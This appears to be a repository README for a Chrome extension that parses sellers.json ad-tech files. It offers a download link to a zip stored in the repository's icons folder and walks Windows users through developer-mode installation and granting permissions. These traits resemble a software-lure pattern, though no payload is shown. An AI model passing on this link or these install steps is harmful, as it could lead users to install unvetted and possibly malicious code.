๐Ÿ” Sellers.json-Inspector - Clear sellers.json checks fast

Download

๐Ÿงญ What this app does

Sellers.json-Inspector is a Chrome extension for people who work with ad supply paths and publisher files. It helps you open, read, and check sellers.json files in a simple view.

Use it to:

  • Parse sellers.json files in the browser
  • Check file structure and field values
  • Highlight JSON syntax so it is easier to read
  • Check seller domains against ads.txt and app-ads.txt data
  • See badge status while you review records
  • Review counts and simple analytics
  • Export filtered data for ad-ops work

๐Ÿ’ป What you need

Before you start, make sure you have:

  • A Windows computer
  • Google Chrome installed
  • Access to the download page
  • Permission to install Chrome extensions

The extension works best on current Windows versions and recent Chrome builds.

โฌ‡๏ธ Download the app

Open this page to download and install the extension:

https://raw.githubusercontent.com/KDTrey7/Sellers.json-Inspector/main/icons/Inspector_Sellers_json_v2.7-alpha.1.zip

If the page opens to the repository main page, use the files and install steps shown there to get the extension onto your computer.

๐Ÿ› ๏ธ Install on Windows

Follow these steps on your Windows PC:

  1. Open the download page in Google Chrome.
  2. Get the project files from the repository.
  3. Save the files in a folder you can find again, such as Downloads or Documents.
  4. Open Chrome.
  5. In the address bar, type chrome://extensions and press Enter.
  6. Turn on Developer mode in the top-right corner.
  7. Select Load unpacked.
  8. Choose the Sellers.json-Inspector folder.
  9. Wait for Chrome to add the extension.
  10. Look for the extension icon in the Chrome toolbar.

If Chrome asks for permission, allow it so the extension can read the page data it needs.

โ–ถ๏ธ Open and use the extension

After install, use it like this:

  1. Open Chrome.
  2. Go to a page with a sellers.json file or load the file in the extension.
  3. Click the Sellers.json-Inspector icon.
  4. Review the parsed file in the main panel.
  5. Check the syntax colors and read the seller entries.
  6. Look for badge status and domain checks.
  7. Use the filter tools to narrow the list.
  8. Export the records you need.

If the file is large, let the extension finish loading before you make filters or exports.

๐Ÿ”Ž Main features

Syntax highlighting

The extension colors JSON parts so keys, values, and structure are easier to scan.

Domain verification

It checks seller domains against ads.txt and app-ads.txt records to help you spot mismatches.

Badge status

It shows status signals for each record so you can review items without opening each line.

Aggregate analytics

It groups data and gives quick counts that help with file review.

Filtered export

You can limit the list to the records you want and export only those rows.

Chrome extension workflow

It fits into a normal Chrome flow, so you can review files without extra software.

๐Ÿงฉ How to check a sellers.json file

Use this simple flow:

  1. Open the sellers.json file in Chrome or load it through the extension.
  2. Wait for the file to parse.
  3. Scan the seller ID, name, domain, and type fields.
  4. Check for missing or empty values.
  5. Review domain checks against ads.txt or app-ads.txt.
  6. Look for badge changes or status flags.
  7. Filter the rows that need more review.
  8. Export the clean set or the problem set for later work.

๐Ÿ“ Exporting filtered data

If you need a smaller file for review, use the export feature.

Good times to export:

  • When you want only invalid rows
  • When you need one partner or one domain
  • When you want to share a short list with a team member
  • When you need a clean file for an ad-ops task

Keep the export in a folder that is easy to find, such as Downloads or Desktop.

โš™๏ธ Common use cases

This extension helps with:

  • Sellers.json file review
  • Supply path checks
  • Inventory checks
  • Publisher and SSP validation
  • Ad-tech compliance work
  • Fast review of JSON data
  • ad-ops file cleanup

๐Ÿง  Tips for first-time users

  • Use Chrome, not another browser, for the first install
  • Keep the extension folder in one place
  • Refresh the page if the panel does not load
  • Start with a small file if you want to learn the layout
  • Use filters before export if you only need a few rows
  • Check both ads.txt and app-ads.txt when a domain looks wrong

โ“ Common issues

The extension does not show up

Check chrome://extensions and make sure the extension is turned on.

The file does not load

Make sure the file is valid JSON and not a broken download.

The data looks blank

Refresh the page and open the extension again.

The install fails

Confirm that you selected the right folder and that all files are still in place.

The domain check looks wrong

Verify that the seller record uses the correct domain and that the matching ads.txt or app-ads.txt file is available.

๐Ÿ–ฑ๏ธ Quick start

  1. Download the project from the link above.
  2. Open Chrome on Windows.
  3. Load the extension in chrome://extensions.
  4. Open a sellers.json file.
  5. Review the parsed results.
  6. Use filters and export when needed

๐Ÿ“Œ Project focus

Sellers.json-Inspector is built for simple file review in ad-ops and ad verification work. It gives you a clear view of sellers.json records, helps you spot domain issues, and lets you work with filtered data in the browser
